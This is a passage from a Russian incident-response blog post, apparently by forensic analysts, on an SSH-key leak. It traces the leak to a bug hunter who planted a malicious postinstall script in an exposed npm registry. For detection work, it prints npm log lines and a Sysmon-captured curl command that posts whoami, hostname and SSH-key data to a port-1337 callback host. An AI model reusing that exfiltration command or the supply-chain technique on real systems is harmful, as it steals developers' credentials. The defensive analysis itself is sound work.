\u043a\u0430\u043a \u043d\u0430\u0448\u043b\u0438 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0421\u043b\u043e\u0432\u043e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u044b \u0437\u0430\u043c\u0435\u043d\u0438\u043b\u0438 \u043d\u0430 Bughunter, \u043d\u0435 \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u043d\u0438\u043a \u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u043f\u0440\u0438 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u043e\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u0435.<\/p>\n<p>\u041d\u0443, \u0430 \u0434\u0430\u043b\u044c\u0448\u0435 \u0443\u0436\u0435 \u0432\u0441\u0435 \u043f\u043e\u0448\u043b\u043e \u043a\u0430\u043a \u043f\u043e \u043c\u0430\u0441\u043b\u0443. \u0412 \u043f\u0440\u043e\u0444\u0438\u043b\u0435 Standoff \u0443 \u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043b\u0438\u0447\u043d\u044b\u0439 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c, \u0432 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0435 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d \u0435\u0433\u043e \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043a\u0430\u043d\u0430\u043b, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043d \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0432\u0435\u0434\u0435\u0442. \u0418\u0437 \u043d\u0435\u0433\u043e \u043c\u044b \u0443\u0437\u043d\u0430\u043b\u0438 \u0444\u0430\u043c\u0438\u043b\u0438\u044e \u0438 \u0438\u043c\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0442\u043e, \u0447\u0442\u043e \u043e\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438. \u0418 \u0447\u0442\u043e VPN-\u0441\u0435\u0440\u0432\u0438\u0441 \u0442\u043e\u0436\u0435 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u0435\u043c\u0443.<\/p>\n<h3>\u041f\u0440\u0435\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u0438 \u043d\u0430\u043a\u0430\u0437\u0430\u043d\u0438\u0435?<\/h3>\n<p>\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e \u0437\u0430 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439 \u043f\u0440\u0435\u0434\u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0430 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u0430\u044f \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u0430\u0448\u0435\u043c\u0443 \u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443. \u0414\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043f\u043e\u0434\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0441\u043e\u0443\u0441\u043e\u043c \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438 \u2014 \u0432\u0435\u0434\u044c \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a \u043d\u0435 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0441\u044f \u043d\u0430 \u043d\u0435\u0433\u043e.<\/p>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u043b\u0438 \u0432\u0441\u044e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0443, \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u0434\u0430\u043b\u044c\u0448\u0435 \u0441\u0430\u043c \u0432\u0435\u0440\u0448\u0438\u043b \u0441\u0443\u0434\u044c\u0431\u0443 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440\u0430-\u043d\u0435\u043b\u0435\u0433\u0430\u043b\u0430. \u041d\u0430\u043c \u0441\u043a\u0430\u0437\u0430\u043b\u0438 \u00ab\u0411\u043e\u043b\u044c\u0448\u043e\u0435 \u0441\u043f\u0430\u0441\u0438\u0431\u043e\u00bb, \u0430 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u043b\u0447\u0430\u0441\u0430 \u0432\u0435\u0440\u043d\u0443\u043b\u0438\u0441\u044c \u0441 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u044c\u044e\u2026<\/p>\n<h3>\u041a\u0430\u043a \u0432\u0441\u0435 \u0431\u044b\u043b\u043e \u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435?<\/h3>\n<p>\u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a \u0431\u044b\u043b \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u043d\u0430 \u00ab\u0437\u0430\u043a\u0440\u044b\u0442\u0443\u044e\u00bb \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438 \u043d\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u043d\u0435\u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0441\u043e\u0431\u044b\u0442\u0438\u044f. \u0418 \u043d\u0430\u0448 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u043b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u043c. \u0422\u0435\u043f\u0435\u0440\u044c \u0432\u0435\u0440\u043d\u0438\u0442\u0435\u0441\u044c \u0432 \u043d\u0430\u0447\u0430\u043b\u043e \u0441\u0442\u0430\u0442\u044c\u0438 \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u043d\u0430 \u0441\u0443\u0441\u043b\u0438\u043a\u0430&#8230;<\/p>\n<p>\u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u043c\u044b, \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u043d\u0435 \u0440\u0430\u0441\u0441\u0442\u0440\u043e\u0438\u043b\u0438\u0441\u044c, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0434\u043e\u0431\u043b\u0435\u0441\u0442\u043d\u044b\u0439 \u0426\u0435\u043d\u0442\u0440 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0418\u0411 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b \u0441\u0432\u043e\u0439 \u0434\u043e\u043b\u0433, \u0438 \u0441\u0447\u0438\u0442\u0430\u0435\u043c, \u0447\u0442\u043e \u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438\u0441\u044c \u0441 \u044d\u0442\u0438\u043c, \u0445\u043e\u0442\u044c \u0438 \u043d\u0435 \u043d\u0430\u0448\u043b\u0438 \u043f\u0440\u0438\u0447\u0438\u043d\u0443 \u0443\u0442\u0435\u0447\u043a\u0438 ssh-\u043a\u043b\u044e\u0447\u0430. \u041d\u043e \u043c\u044b \u0431\u044b\u043b\u0438 \u043e\u0447\u0435\u043d\u044c \u0431\u043b\u0438\u0437\u043a\u0438\u2026<\/p>\n<p>\u0411\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043d\u0430\u0448\u0435\u043b \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 npm-\u0440\u0435\u0435\u0441\u0442\u0440 \u0417\u0430\u043a\u0430\u0437\u0447\u0438\u043a\u0430, \u0433\u0434\u0435 \u0431\u044b\u043b\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f. \u041e\u043d \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u0438 \u0437\u0430\u043c\u0435\u043d\u0438\u043b \u043e\u0434\u0438\u043d \u0438\u0437 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u043d\u0430 \u0441\u0432\u043e\u044e \u0432\u0435\u0440\u0441\u0438\u044e, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 postinstall. \u0427\u0435\u0440\u0435\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0432 IDE WebStorm \u0438 \u043f\u043e\u0434\u0442\u044f\u043d\u0443\u043b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442. \u0421\u043a\u0440\u0438\u043f\u0442 \u0441\u043e\u0431\u0440\u0430\u043b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 ~\/.ssh, \u0430 \u0437\u0430\u0442\u0435\u043c \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043b \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044e \u043d\u0430 C2. \u0422\u0430\u043a\u043e\u0439 \u0432\u043e\u0442 \u0432\u044b\u0448\u0435\u043b \u0441\u0432\u043e\u0435\u0433\u043e \u0440\u043e\u0434\u0430 supply chain.<\/p>\n<p>\u0410 \u0431\u043b\u0438\u0437\u043a\u0438 \u043c\u044b \u0431\u044b\u043b\u0438, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043f\u0440\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0432\u0438\u0434\u0435\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 npm-\u0440\u0435\u0435\u0441\u0442\u0440, \u043e\u0434\u043d\u0430\u043a\u043e \u0442\u043e\u0442 \u043f\u0430\u043a\u0435\u0442 \u043d\u0435 \u0431\u044b\u043b \u0432\u0438\u0434\u0435\u043d \u043d\u0430 \u0433\u043b\u0430\u0432\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435, \u043d\u0430\u0439\u0442\u0438 \u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u0443\u044e \u0441\u0442\u0440\u043e\u043a\u0443. \u0414\u0430 \u0438 \u0432\u0440\u044f\u0434 \u043b\u0438 \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u0443\u043b\u0438\u043a \u043a\u0442\u043e-\u0442\u043e \u043f\u043e\u0439\u0434\u0435\u0442 \u043f\u0435\u0440\u0435\u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u0441\u0435\u0445 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u043d\u0430 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f. \u0422\u0435\u043c \u0431\u043e\u043b\u0435\u0435, \u0447\u0442\u043e \u043f\u043e \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u0430\u043c \u041e\u0421 \u043d\u0435 \u0431\u044b\u043b\u043e \u0432\u0438\u0434\u043d\u043e \u044f\u0432\u043d\u044b\u0445 \u043d\u0435\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439.<\/p>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u0436\u0435, \u0437\u043d\u0430\u044f \u0441\u043f\u043e\u0441\u043e\u0431 \u00ab\u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f\u00bb, \u043c\u044b \u043f\u0440\u043e\u0432\u0435\u043b\u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 \u0430 \u0433\u0434\u0435 \u0432 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435 \u044d\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043d\u0430 \u0443\u0437\u043b\u0435?<\/p>\n<p>\u0412 \u043b\u043e\u0433\u0430\u0445 npm-cache <em>C:\\Users\\user\\AppData\\Local\\npm-cache\\_logs\\timestamp-debug-0<\/em> \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0434\u0432\u0435 \u0441\u0442\u0440\u043e\u0447\u043a\u0438, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u0435\u0441\u044f \u043a \u0441\u043a\u0440\u0438\u043f\u0442\u0443:<\/p>\n<p>info run @test-ui\/[masked]@2.5.5 postinstall node_modules\/@test-ui\/[masked] sh postinstall.sh<\/p>\n<p>info run @ est-ui\/[masked]@.5.5 postinstall { code: 0, signal: null }<\/p>\n<p>\u0418\u2026 \u044d\u0442\u043e \u0432\u0441\u0435. \u041a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u0430, \u043d\u0438\u0433\u0434\u0435 \u043d\u0435 \u0432\u0438\u0434\u043d\u043e. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0441\u0430\u043c \u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0435 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u0443\u0437\u043b\u0435 \u043a\u0430\u043a \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043c\u043e\u0433 \u0431\u044b \u043f\u043e\u043c\u043e\u0447\u044c \u0442\u043e\u043b\u044c\u043a\u043e Sysmon\\EDR.<\/p>\n<p>\u041f\u0440\u0438\u043c\u0435\u0440 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043d\u0430 \u04212 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043e\u0431\u044b\u0442\u0438\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 Sysmon 1:<\/p>\n<p><code>\"C:\\Program Files\\Git\\mingw64\\bin\\curl.exe\" -s -m 10 -X POST http:\/\/100.100.100.100:1337\/npm-callback -H \"Content-Type: application\/json\" -d \"{\\\"whoami\\\":\\\"user\\\",\\\"id\\\":\\\"uid=1049690(user) gid=1049089 groups=1049089\\\",\\\"hostname\\\":\\\"WS01\\\",\\\"uname\\\":\\\"MINGW64_NT-10.0-19045 WS01 3.6.7-fb42d713.x86_64 Msys\\\",\\\"pwd\\\":\\\"\/c\/Users\/user\/Downloads\/node_modules\/@test-ui\/[masked]\\\",\\\"ifconfig\\\":\\\"\\\",\\\"ssh_info\\\":\\\"no keys found\\\",\\\"ssh_keys\\\":\\\"none\\\",\\\"ci_env\\\":\\\"none\\\",\\\"k8s_sa\\\":\\\"none\\\",\\\"docker\\\":\\\"none\\\"}\"<\/code><\/p>\n<p>\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u0443 \u043d\u0430\u0441 \u043d\u0430 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u0431\u044b\u043b \u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u043e\u043c\u043f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0435 \u0431\u044b\u043b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d \u0434\u0430\u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u0443\u0434\u0438\u0442.<\/p>\n<h2>\u041f\u043e\u0434\u0432\u043e\u0434\u0438\u043c \u0438\u0442\u043e\u0433\u0438<\/h2>\n<p>\u0412\u0441\u0435\u043c \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u0442\u0441\u044f \u0441 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u043a\u0440\u0430\u0436\u0438 ssh-\u043a\u043b\u044e\u0447\u0430 \u0438 \u043d\u0435 \u043d\u0430\u0439\u0434\u0443\u0442 \u0435\u0433\u043e \u0432 \u0443\u0442\u0435\u0447\u043a\u0430\u0445, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u043a\u0430\u043a\u0438\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0430 \u0443\u0437\u043b\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430. \u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0442\u0435 \u043d\u0435\u043c\u043d\u043e\u0433\u0438\u0435 \u0441\u043b\u0435\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0432 \u043b\u043e\u0433\u0430\u0445 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u043e\u0432 \u043f\u0430\u043a\u0435\u0442\u043e\u0432. \u0418 \u043f\u043e\u0442\u0440\u0430\u0442\u044c\u0442\u0435 \u0432\u0440\u0435\u043c\u044f \u043d\u0430 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u043d\u044b\u0445 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435.<\/p>\n<p>\u0410 \u0447\u0442\u043e \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u0432 \u043f\u043e\u0445\u043e\u0436\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435:<\/p>\n<ol>\n<li>\n<p>\u043d\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0443\u0439\u0442\u0435 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c;<\/p>\n<\/li>\n<li>\n<p>\u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u043c\u043d\u043e\u0433\u043e\u0444\u0430\u043a\u0442\u043e\u0440\u043d\u0443\u044e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0431\u0435\u0441\u043f\u0435\u0447\u044c\u0442\u0435 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u0438 \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0439\u0442\u0435 \u0438\u0437\u043b\u0438\u0448\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a \u0444\u043e\u0440\u043c\u0430\u043c \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438);<\/p>\n<\/li>\n<li>\n<p>\u043d\u0435 \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u0439\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u044b\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438;<\/p>\n<\/li>\n<li>\n<p>\u0440\u0430\u0437\u0434\u0435\u043b\u0438\u0442\u0435 gitlab-runners \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u0442\u0438\u043f\u043e\u0432 \u0437\u0430\u0434\u0430\u0447;<\/p>\n<\/li>\n<li>\n<p>\u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u0442\u0435 gitlab-runners \u0432 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u0434\u0441\u0435\u0442\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u0442\u0435 \u0436\u0435\u0441\u0442\u043a\u0438\u0435 ACL \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432;<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u043f\u043e\u0434\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043c\u0438\u0442\u043e\u0432 \u0434\u043b\u044f \u0432\u0430\u043b\u0438\u0434\u0430\u0446\u0438\u0438 \u0432\u043d\u043e\u0441\u0438\u043c\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0432 gitlab;<\/p>\n<\/li>\n<li>\n<p>\u043d\u0430\u0441\u0442\u0440\u043e\u0439\u0442\u0435 \u0441\u0440\u043e\u043a \u0436\u0438\u0437\u043d\u0438 ssh-\u043a\u043b\u044e\u0447\u0435\u0439 \u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0438 gitlab;<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u043c \u0430\u0443\u0434\u0438\u0442\u043e\u043c \u0438 \u0441\u0431\u043e\u0440\u043e\u043c \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430.<\/p>\n<\/li>\n<\/ol>\n<p><em>\u0410\u0432\u0442\u043e\u0440\u044b:<\/em><\/p>\n<p><em>\u0412\u0430\u043b\u0435\u0440\u0438\u044f \u0428\u043e\u0442\u0442, \u0432\u0435\u0434\u0443\u0449\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a \u0433\u0440\u0443\u043f\u043f\u044b \u043a\u0438\u0431\u0435\u0440\u043a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u0438\u0441\u0442\u0438\u043a\u0438 \u00ab\u0418\u043d\u0444\u043e\u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0414\u0436\u0435\u0442\u00bb<\/em><\/p>\n<p><em>\u0414\u0430\u043d\u0438\u0438\u043b \u041a\u0438\u0440\u044c\u044f\u043a\u043e\u0432, \u0432\u0435\u0434\u0443\u0449\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a \u0433\u0440\u0443\u043f\u043f\u044b 